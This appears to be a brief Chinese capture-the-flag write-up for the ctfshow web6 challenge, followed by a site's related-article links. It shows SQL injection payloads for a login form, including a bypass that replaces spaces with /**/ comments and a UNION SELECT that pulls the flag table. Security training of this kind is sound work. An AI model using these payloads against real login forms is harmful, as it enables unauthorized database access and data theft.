ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
bl4ckpe4ch4 小时前
用可复现实验直观理解 CORS 与 CSRF 的区别与联系
前端·web安全·网络安全·csrf·cors
合天网安实验室4 小时前
从HTML注入到CSRF:一次漏洞组合拳实战
web安全·csrf·漏洞实战·html注入
zhengfei6115 小时前
AI渗透工具——AI驱动的BAS网络安全平台
人工智能·安全·web安全
蓝之白7 小时前
流量分析_SnakeBackdoor-1~6
web安全·ctf·流量分析·逆向分析
龙亘川8 小时前
2027 年 1 月 1 日起施行!GB46864 新规落地,二手电子产品信息清除有了 “铁规矩”,你的隐私不再 “裸奔”
网络·安全·web安全
未知鱼1 天前
XSS、CSRF、SSRF攻击原理与防护全解析
前端·安全·web安全·网络安全·系统安全·xss·csrf
蓝之白1 天前
Web15-网站被黑
web安全·ctf
sld1681 天前
动态防御筑牢数字防线:WAAP赋能企业安全转型
网络·安全·web安全
未知鱼1 天前
SQL注入
数据库·安全·web安全·网络安全·网络攻击模型
能年玲奈喝榴莲牛奶1 天前
安全服务-网络安全培训服务
web安全·网络安全